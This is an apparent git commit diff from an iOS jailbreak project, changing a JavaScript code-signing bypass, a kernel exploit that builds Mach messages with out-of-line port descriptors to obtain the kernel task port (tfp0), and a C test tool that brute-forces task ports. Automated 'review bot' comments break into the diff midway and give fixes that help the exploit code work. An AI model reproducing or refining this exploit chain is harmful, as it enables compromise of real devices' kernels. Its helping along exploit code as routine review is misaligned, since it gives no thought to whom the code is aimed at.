From 42647b796f0f54122e7f46522d8e681825daf54b Mon Sep 17 00:00:00 2001
From: spv420
Date: Fri, 15 Jul 2022 15:03:50 -0400
Subject: dump
---
 src/js/csbypass.js | 2 +-
 src/js/kexp/exploit.js | 8 +++++---
 src/js/main.js | 6 ++++--
 tools/testlol.c | 26 +++++++++++++++++++-------
 4 files changed, 29 insertions(+), 13 deletions(-)
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 8f7a56e..3065099 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) {
 printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test);
+ call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
 printf("fuck1\n");
 callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
 printf("fuck2\n");
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 write_u32(InP + 0x18, 1);
 write_u32(InP + 0x1c, init_port_set);
 write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
 write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
 write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
 write_u32(InP + 0x30, fake_count);
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 function mach_ports_lookup_shit() {
 printf("fuck\n");
 var arrz = shit_heap(4);
+ var arrz2 = shit_heap(4);
 printf("fuck\n");
- write_u32(arrz, 0);
+ write_u32(arrz, arrz2);
+ write_u32(arrz2, 0);
 printf("fuck\n");
 var sz = shit_heap(4);;
 printf("fuck\n");
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
 // var mts = mach_task_self();
 printf("fuck\n");
 calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 printf("mpl success\n");
 return read_u32(read_u32(arrz) + 8);
@@ -461,7 +464,6 @@ again: while (true) {
 // while (true) {
 //
 // }
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 printf("fuck\n");
 // var fake_port = read_u32(read_u32(arrz) + 8);
diff --git a/src/js/main.js b/src/js/main.js
index 5c45e85..75d730d 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,14 +77,16 @@ function main() {
 large_buf[0] = 0x41424344;
 printf("%x\n", read_u32(large_buf_ptr));
+ setup_fancy_rw();
+
 // csbypass();
 // return;
- setup_fancy_rw();
 printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
-
+
+//return;
 var tfp0 = get_kernel_task();
 printf("tfp0=%x\n", tfp0);
diff --git a/tools/testlol.c b/tools/testlol.c
index 85c9cb2..d39bf47 100755
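Review bot: The literal `0x0213c600` written at `InP + 0x24` replaces an expression composed from a shifted disposition and `MACH_MSG_OOL_PORTS_DESCRIPTOR`, and the two do not obviously evaluate to the same value (assuming the descriptor constant is 2, the old form gives 0x02130000, so the low half differs), which makes the change semantic rather than cosmetic while leaving no trace of which field bits are intended. Keep the composed form and name the extra bits, e.g. `write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24) + /* TODO: name these bits */ 0xc600));`, or at minimum add a comment beside the literal explaining what it encodes. r3gister's body continues outside the hunk on both sides.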
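Review bot: The added `//return;` below the hexdump call in main() is commented-out code kept as a debugging toggle, next to the existing `// csbypass();` and `// return;` lines, so the function now carries several dormant early exits whose purpose is not recorded. Remove the commented-out lines, or gate the debugging stop behind a named flag such as `if (DEBUG_STOP_AFTER_HEXDUMP) return;` so the intent is visible and the diff stops churning them. main's body continues outside the hunk.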
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -199,20 +199,23 @@ int main(int argc, char* argv[]) {
 Request *InP = &Mess.In;
 Reply *OutP = &Mess.Out;
-#if 0
 InP->msgh_body.msgh_descriptor_count = 1;
- InP->init_port_set.address = (void*)(init_port_set);
- InP->init_port_set.count = real_count;
+ InP->init_port_set.address = (void*)(0x41414141);
+ InP->init_port_set.count = 0x42424242;
 InP->init_port_set.disposition = 19;
 InP->init_port_set.deallocate = FALSE;
 InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
 InP->NDR = NDR_record;
- InP->init_port_setCnt = fake_count; // was real_count
+ InP->init_port_setCnt = 0x43434343; // was real_count
 InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- InP->Head.msgh_remote_port = task;
- InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_remote_port = 0x45454545;
+ InP->Head.msgh_local_port = 0x69696969;
 InP->Head.msgh_id = 3403;
-#endif
+
+ for (int i = 0; i < 0x100; i++) {
+ printf("%02x", ((uint8_t*)InP)[i]);
+ }
+ printf("\n");
 printf(" InP->msgh_body.msgh_descriptor_count %p %p\n", ((void*)& InP->msgh_body.msgh_descriptor_count ) - ((void*)InP), sizeof( InP->msgh_body.msgh_descriptor_count ));
 printf(" InP->init_port_set.address %p %p\n", ((void*)& InP->init_port_set.address ) - ((void*)InP), sizeof( InP->init_port_set.address ));
@@ -255,6 +258,15 @@ typedef struct {
 printf("%p\n", ((void*)ptraaa) - ((void*)kportaaa));
+ printf("===validity check\n");
+
+ uintptr_t whatever;
+
+ for (mach_port_t i = 0; i < 0x1000000; i++) {
+ if (pid_for_task(i, &whatever) == KERN_SUCCESS)
+ printf("0x%x\n", i);
+ }
+
 #if 0
 kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 if(ret == KERN_SUCCESS)
--
cgit v1.2.3
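Review bot: The new dump loop `for (int i = 0; i < 0x100; i++)` reads a fixed 0x100 bytes through `(uint8_t*)InP`, but `InP` points at `Mess.In`, a `Request`, whose size is not visible here; if `sizeof(Request)` is below 0x100 the loop reads past the object into whatever follows in `Mess`, which is undefined behaviour and would print unrelated stack bytes as if they were the message. Bound the loop by the object it dumps: `for (size_t i = 0; i < sizeof *InP; i++) { printf("%02x", ((uint8_t*)InP)[i]); }`, which also keeps the dump in step if the struct layout changes. main's body continues outside the hunk on both sides.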
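Review bot: `uintptr_t whatever` is passed as `&whatever` to `pid_for_task`, whose second parameter is declared as `int *` in the Mach trap header as far as I recall (verify against the SDK's mach_traps.h); on a 64-bit build the pointee types differ, the compiler should warn about the incompatible pointer, and only the low half of `whatever` is ever written. Declare the out-parameter with the callee's type, `int pid = 0;` and pass `&pid`, so the call is type-correct without a cast. main's body continues outside the hunk on both sides.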